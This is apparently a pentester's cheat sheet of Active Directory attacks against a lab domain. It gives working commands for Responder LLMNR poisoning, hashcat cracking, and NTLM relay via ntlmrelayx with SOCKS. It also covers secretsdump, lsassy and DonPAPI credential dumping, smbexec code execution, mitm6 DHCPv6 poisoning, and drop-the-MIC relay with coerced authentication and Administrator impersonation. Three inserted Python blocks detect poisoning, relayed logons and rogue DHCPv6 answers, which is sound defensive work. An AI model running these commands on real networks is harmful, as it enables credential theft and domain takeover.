Responder

It will give you:

  • usernames
  • NetNTLMv1 (only from very old servers) / NetNTLMv2 hashes
  • the ability to redirect the authentication elsewhere (NTLM relay)
responder -I $interfacename
hashcat -m 5600 --force -a 0 responder.hashes /usr/share/wordlists/rockyou.txt
  • Alternate Responder (run from a local checkout with its own virtualenv)

sudo su
cd /opt/active_directory/Responder
source venv-responder/bin/activate
sudo systemctl stop smbd
sudo systemctl disable smbd
./Responder.py -I tun0

Responder keeps its logs in /opt/tools/Responder/logs (on Exegol) if you need to look at them again.

If you want to discard the previously captured hashes (Responder otherwise reports them as "skipped previously captured hash" and does not show them again), delete the file /opt/tools/Responder/Responder.db.
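Detection side of the LLMNR poisoning Responder relies on, as an added example (not part of these notes nor of the Responder project): query the LLMNR multicast group for a canary name that does not exist and treat any answer as a poisoner, since no legitimate host owns that name. The `probe_llmnr` function does the live check; `poisoner_ips` is the offline parser, exercised here on a constructed reply that claims 192.168.56.1 for the name `canary-fs01` (both the name and the bytes are constructed for the example).

```python
import secrets
import socket
import struct

LLMNR_MCAST = "224.0.0.252"   # LLMNR multicast group (RFC 4795)
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length byte + label, terminated by a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """One LLMNR query (type A, class IN) for `name`; the header layout is DNS."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def decode_name(data: bytes, offset: int):
    """Decode a (possibly compressed) name; returns (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:  # compression pointer back into the packet
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            name, _ = decode_name(data, pointer)
            labels.append(name)
            return ".".join(labels), offset + 2
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def parse_llmnr_response(data: bytes) -> dict:
    """Pull transaction id, QR flag, queried name and A-record answers out of a reply."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    offset, qname, answers = 12, None, []
    for _ in range(qdcount):
        qname, offset = decode_name(data, offset)
        offset += 4  # skip QTYPE and QCLASS
    for _ in range(ancount):
        _, offset = decode_name(data, offset)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        if rtype == 1 and rdlen == 4:
            answers.append(socket.inet_ntoa(data[offset:offset + 4]))
        offset += rdlen
    return {"txid": txid, "is_response": bool(flags & 0x8000),
            "qname": qname, "answers": answers}


def poisoner_ips(query: bytes, response: bytes) -> list:
    """IPs a reply claims for our canary name. Any non-empty result is a poisoner:
    the name does not exist, so a legitimate host would never answer it."""
    expected_txid = struct.unpack("!H", query[:2])[0]
    reply = parse_llmnr_response(response)
    if not reply["is_response"] or reply["txid"] != expected_txid:
        return []
    return reply["answers"]


def probe_llmnr(name=None, timeout=2.0) -> list:
    """Live check: multicast one canary query and collect the source IPs of any replies."""
    name = name or "canary-" + secrets.token_hex(4)
    query = build_llmnr_query(name, secrets.randbelow(0x10000))
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    hits = []
    try:
        sock.sendto(query, (LLMNR_MCAST, LLMNR_PORT))
        while True:
            data, (src, _) = sock.recvfrom(2048)
            if poisoner_ips(query, data):
                hits.append(src)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


# Constructed sample: what a poisoned reply to "canary-fs01" looks like on the wire,
# answering with 192.168.56.1 (the attacker box used elsewhere in these notes).
SAMPLE_QUERY = build_llmnr_query("canary-fs01", 0x1234)
SAMPLE_POISONED_REPLY = (
    b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00"   # id, QR=1, 1 question, 1 answer
    b"\x0bcanary-fs01\x00\x00\x01\x00\x01"                # question: canary-fs01 A IN
    b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04"   # ptr to name, A, IN, TTL 30, len 4
    b"\xc0\xa8\x38\x01"                                   # 192.168.56.1
)

if __name__ == "__main__":
    print("offline sample:", poisoner_ips(SAMPLE_QUERY, SAMPLE_POISONED_REPLY))
    print("live probe:", probe_llmnr())
```

Run the probe from a host on each VLAN on a schedule; a non-empty result means something on that segment is answering names it does not own, which is exactly the behaviour the `responder -I` command above produces. The offline parser ignores replies whose transaction id does not match, so stray LLMNR traffic from other hosts' queries is not counted.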

If the captured hash cannot be cracked offline, a relay attack may still be possible.

SMB signing must not be required on the server we are targeting for this attack to work.

responder + ntlmrelayx to smb

Finding unsigned SMB servers

cme smb $IP_RANGE --gen-relay-list relay.txt

Relaying settings for Responder

Before starting Responder to poison the answers to LLMNR, mDNS and NBT-NS requests, we must stop Responder's own SMB and HTTP servers: we do not want it to capture the hashes itself, we want the authentication relayed to ntlmrelayx.

OFF (disable Responder's HTTP and SMB servers)
sudo sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'HTTP ='
sudo sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'SMB ='

ON (re-enable them once the relay is done)
sudo sed -i 's/HTTP = Off/HTTP = On/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'HTTP ='
sudo sed -i 's/SMB = Off/SMB = On/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'SMB ='

Same toggles in a single regex each (OFF, then ON), tolerant of extra whitespace around the "="
sudo sed -i -E 's/(HTTP|SMB)[[:space:]]+=[[:space:]]+On/\1      = Off/g' /usr/share/responder/Responder.conf && grep -E '(HTTP|SMB)[[:space:]]+=' /usr/share/responder/Responder.conf | head -3
sudo sed -i -E 's/(HTTP|SMB)[[:space:]]+=[[:space:]]+Off/\1      = On/g' /usr/share/responder/Responder.conf && grep -E '(HTTP|SMB)[[:space:]]+=' /usr/share/responder/Responder.conf | head -3

Start ntlmrelayx

ntlmrelayx.py -tf relay.txt -of netntlm -smb2support -socks
  • -tf : list of targets to relay the authentication to
  • -of : output file; keeps the captured NetNTLM hashes, as Responder did earlier, so they can be cracked later
  • -smb2support : support for SMB2
  • -socks : starts a SOCKS proxy through which the relayed sessions can be used

pip3 install Flask Jinja2 --upgrade

responder -I $Interfacename
 

Use the SOCKS connections to dump secrets with Impacket's secretsdump

proxychains secretsdump.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

Use the SOCKS connection to dump secrets with lsassy

proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22

Use the SOCKS connection to dump secrets with DonPAPI

proxychains DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

smbclient

  • Connect directly to the SMB server with smbclient
proxychains smbclient.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

Code execution: smbexec or atexec

  • Through a SOCKS connection only smbexec and atexec work; wmiexec, psexec and dcomexec will not.
proxychains smbexec.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
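What the relay described above looks like from the target's own security log, as an added example (not from these notes): a relayed network logon is recorded as a 4624 with NTLM authentication, but the workstation name belongs to the victim while the source IP is the relay host. The function below walks constructed 4624 records (flat JSON of the kind a log shipper emits; field names are those of the Windows event) and flags that mismatch against a constructed hostname-to-IP inventory, plus any remaining NTLMv1 use. The hostnames, users and 192.168.56.1 as relay box are assumptions taken from the lab naming used elsewhere on this page.

```python
import json

# Constructed inventory (assumption: in practice built from DHCP leases / DNS records).
INVENTORY = {
    "WINTERFELL": "192.168.56.11",
    "CASTELBLACK": "192.168.56.22",
    "BRAAVOS": "192.168.56.23",
}

# Constructed 4624 records. 192.168.56.1 plays the relay box from these notes.
SAMPLE_EVENTS = [
    '{"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",'
    ' "TargetUserName": "jon.snow", "WorkstationName": "WINTERFELL", "IpAddress": "192.168.56.11",'
    ' "Computer": "castelblack.north.sevenkingdoms.local"}',
    '{"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",'
    ' "TargetUserName": "eddard.stark", "WorkstationName": "WINTERFELL", "IpAddress": "192.168.56.1",'
    ' "Computer": "castelblack.north.sevenkingdoms.local"}',
    '{"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",'
    ' "TargetUserName": "catelyn.stark", "WorkstationName": "-", "IpAddress": "192.168.56.11",'
    ' "Computer": "castelblack.north.sevenkingdoms.local"}',
    '{"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1",'
    ' "TargetUserName": "samwell.tarly", "WorkstationName": "DESKTOP-7K3Q", "IpAddress": "192.168.56.1",'
    ' "Computer": "castelblack.north.sevenkingdoms.local"}',
]


def suspicious_ntlm_logons(lines, inventory):
    """Flag network NTLM logons whose claimed workstation does not match the source IP,
    plus any NTLMv1 use. A relayed logon carries the victim's workstation name but
    arrives from the relay host, so the two disagree."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue
        workstation = ev.get("WorkstationName", "").upper()
        source = ev.get("IpAddress")
        reasons = []
        expected = inventory.get(workstation)
        if expected is None:
            reasons.append("workstation name not in inventory")
        elif expected != source:
            reasons.append(f"{workstation} is expected at {expected}, logon came from {source}")
        if ev.get("LmPackageName") == "NTLM V1":
            reasons.append("NTLMv1 still in use")
        if reasons:
            findings.append({
                "user": ev.get("TargetUserName"),
                "workstation": workstation,
                "source": source,
                "target": ev.get("Computer"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in suspicious_ntlm_logons(SAMPLE_EVENTS, INVENTORY):
        print(finding)
```

The workstation/IP mismatch is a triage signal rather than proof: VPN concentrators, NAT and multi-homed hosts produce the same pattern legitimately, so the inventory has to reflect what the target actually sees. Requiring SMB signing (and LDAP signing / channel binding for the LDAPS variant further down) removes the relay path itself; this check is for spotting attempts while that rollout is incomplete.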

mitm6 + ntlmrelayx to LDAP

Another useful way to poison the network is to answer DHCPv6 requests and set our host as the default DNS server. Windows prefers IPv6 over IPv4 by default, so by answering the DHCPv6 queries we can change the victims' DNS server and redirect their queries to our machine; the tool for this is mitm6.

Start mitm6 for all the domains in the network

mitm6 -i wlan0 -d essos.local -d sevenkingdoms.local -d north.sevenkingdoms.local --debug
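The DHCPv6 answer this technique depends on is easy to spot on the wire, so here is a parser for it as an added example (not from these notes nor from the mitm6 project). It decodes a DHCPv6 message, extracts the recursive DNS server option (23) and the domain search list (24), and reports any DNS server that is not on an allow-list; on a network that does not run DHCPv6 at all, any ADVERTISE is already a finding. The sample ADVERTISE bytes, the `fe80::1` server address and the `2001:db8::53` allow-list entry are constructed for the example; `essos.local` is the lab domain from the command above.

```python
import ipaddress
import struct

DHCPV6_ADVERTISE = 2
DHCPV6_REPLY = 7
OPT_SERVERID = 2
OPT_DNS_SERVERS = 23     # RFC 3646: list of 16-byte IPv6 addresses
OPT_DOMAIN_LIST = 24     # RFC 3646: DNS-encoded search list


def parse_dhcpv6(data: bytes) -> dict:
    """Split a DHCPv6 message into type, transaction id and a flat option list."""
    msg_type = data[0]
    txid = int.from_bytes(data[1:4], "big")
    options, offset = [], 4
    while offset + 4 <= len(data):
        code, length = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        options.append((code, data[offset:offset + length]))
        offset += length
    return {"type": msg_type, "txid": txid, "options": options}


def dns_servers(msg: dict) -> list:
    """IPv6 addresses offered as recursive DNS servers (option 23)."""
    servers = []
    for code, value in msg["options"]:
        if code == OPT_DNS_SERVERS:
            for i in range(0, len(value) - len(value) % 16, 16):
                servers.append(str(ipaddress.IPv6Address(value[i:i + 16])))
    return servers


def domain_search_list(msg: dict) -> list:
    """Domains from option 24, which uses DNS label encoding."""
    names = []
    for code, value in msg["options"]:
        if code != OPT_DOMAIN_LIST:
            continue
        labels, offset = [], 0
        while offset < len(value):
            length = value[offset]
            offset += 1
            if length == 0:
                names.append(".".join(labels))
                labels = []
            else:
                labels.append(value[offset:offset + length].decode("ascii"))
                offset += length
    return names


def rogue_dns_servers(data: bytes, allowed: list) -> list:
    """DNS servers in an ADVERTISE/REPLY that are not on the allow-list."""
    msg = parse_dhcpv6(data)
    if msg["type"] not in (DHCPV6_ADVERTISE, DHCPV6_REPLY):
        return []
    allowed_set = {ipaddress.IPv6Address(a) for a in allowed}
    return [s for s in dns_servers(msg) if ipaddress.IPv6Address(s) not in allowed_set]


# Constructed sample: an ADVERTISE that pushes fe80::1 as DNS server and essos.local
# as search domain, i.e. the shape of answer the technique above relies on.
SAMPLE_ADVERTISE = (
    b"\x02\x0a\x1b\x2c"                                          # ADVERTISE, txid 0x0a1b2c
    b"\x00\x02\x00\x0a\x00\x03\x00\x01\x02\x00\x00\x00\x00\x01"  # Server-ID (DUID-LL)
    b"\x00\x17\x00\x10\xfe\x80" + b"\x00" * 13 + b"\x01"         # option 23: fe80::1
    b"\x00\x18\x00\x0d\x05essos\x05local\x00"                     # option 24: essos.local
)

if __name__ == "__main__":
    print(rogue_dns_servers(SAMPLE_ADVERTISE, allowed=["2001:db8::53"]))
```

Feed it the UDP payloads seen on port 546 (client side) from a span port or a host-based sensor. The link-local source address is itself a tell: a legitimate DHCPv6 server hands out the addresses of your real resolvers, not one on the attacker's own interface. Where IPv6 is not in use, DHCPv6 Guard / RA Guard on the access switches, or a host firewall rule dropping inbound UDP 546, closes this path outright.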

Answer the WPAD queries and relay the resulting HTTP authentication to LDAPS on the DC to add a computer account with delegate access.

ntlmrelayx.py -6 -wh wpadfakeserver.essos.local -t ldaps://meereen.essos.local --add-computer relayedpccreate --delegate-access

Extra (don't know much about it yet)

ntlmrelayx.py -6 -wh wpadfakeserver.essos.local -t ldaps://meereen.essos.local -l /workspace/loot

Open an RDP connection to the system

Coerced auth SMB + ntlmrelayx to LDAPS with drop the MIC

  • Start the relay with --remove-mic against the LDAPS service of meereen.essos.local.
ntlmrelayx -t ldaps://meereen.essos.local -smb2support --remove-mic --add-computer removemiccomputer --delegate-access
  • Run the coerced authentication against braavos (braavos is an up-to-date Windows Server 2016, so unauthenticated PetitPotam will not work here)
python3 coercer.py -u khal.drogo -d essos.local -p horse -t braavos.essos.local -l 192.168.56.1
getST.py -spn HOST/BRAAVOS.ESSOS.LOCAL -impersonate Administrator -dc-ip 192.168.56.12 'ESSOS.LOCAL/removemiccomputer$:{yp};c@.>,{zoqu'

export KRB5CCNAME=Administrator.ccache

secretsdump -k -no-pass ESSOS.LOCAL/'Administrator'@braavos.essos.local